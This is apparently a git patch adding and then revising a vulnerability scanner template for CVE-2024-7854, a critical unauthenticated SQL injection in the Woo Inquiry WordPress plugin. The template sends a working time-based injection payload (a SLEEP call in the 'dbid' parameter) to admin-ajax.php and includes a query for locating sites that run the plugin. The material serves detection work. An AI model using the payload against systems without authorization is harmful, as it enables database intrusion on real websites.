From 1494e4eb42a09c20998932eec64e0782fddeef12 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 4 Oct 2024 21:34:24 +0300 Subject: [PATCH 1/2] add CVE-2024-7854 --- http/cves/2024/CVE-2024-7854.yaml | 60 +++++++++++++++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 http/cves/2024/CVE-2024-7854.yaml diff --git a/http/cves/2024/CVE-2024-7854.yaml b/http/cves/2024/CVE-2024-7854.yaml new file mode 100644 index 0000000000..5e3a15b092 --- /dev/null +++ b/http/cves/2024/CVE-2024-7854.yaml @@ -0,0 +1,60 @@ +id: CVE-2024-7854 + +info: + name: Woo Inquiry <= 0.1 - SQL Injection + author: s4e-io + severity: critical + description: | + The Woo Inquiry plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 0.1 due to insufficient escaping on the user supplied parameter 'dbid' and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/RandomRobbieBF/CVE-2024-7854 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/312a6601-c914-4661-82ff-6f8bac849442?source=cve + - https://nvd.nist.gov/vuln/detail/CVE-2024-7854 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-7854 + cwe-id: CWE-89 + epss-score: 0.00091 + epss-percentile: 0.39655 + cpe: cpe:2.3:a:sjhoo:woo_inquiry:0.1:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: sjhoo + product: woo_inquiry + framework: wordpress + publicwww-query: "/wp-content/plugins/woo-inquiry" + tags: cve,cve2024,wp-plugin,sqli + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"/wp-content/plugins/woo-inquiry")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=woo_wpinq_times_up&dbid=(SELECT(0)FROM(SELECT(SLEEP(6)))a) + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and From 098b89ed27331d87ffcdbbdf90b525efcc863b7a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 8 Oct 2024 10:30:46 +0400 Subject: [PATCH 2/2] Update CVE-2024-7854.yaml --- http/cves/2024/CVE-2024-7854.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-7854.yaml b/http/cves/2024/CVE-2024-7854.yaml index 5e3a15b092..66fb667893 100644 --- a/http/cves/2024/CVE-2024-7854.yaml +++ b/http/cves/2024/CVE-2024-7854.yaml @@ -25,7 +25,7 @@ info: product: woo_inquiry framework: wordpress publicwww-query: "/wp-content/plugins/woo-inquiry" - tags: cve,cve2024,wp-plugin,sqli + tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,woo-inquiry flow: http(1) && http(2) @@ -39,12 +39,11 @@ http: - type: dsl dsl: - 'contains(body,"/wp-content/plugins/woo-inquiry")' - - 'status_code == 200' - condition: and internal: true - raw: - | + @timeout: 20s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8